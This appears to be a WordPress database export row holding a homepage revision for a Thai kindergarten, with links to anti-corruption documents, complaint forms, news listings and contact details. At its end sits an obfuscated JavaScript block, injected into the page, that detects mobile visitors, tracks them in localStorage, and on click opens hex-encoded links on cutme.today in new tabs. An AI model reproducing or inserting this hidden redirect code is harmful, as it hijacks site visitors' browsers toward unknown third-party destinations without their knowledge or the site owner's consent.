900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-09-24 11:49:16','2024-09-24 04:49:16','',19,'http://watprato.ssk.in.th/?p=438',0,'revision','',0),
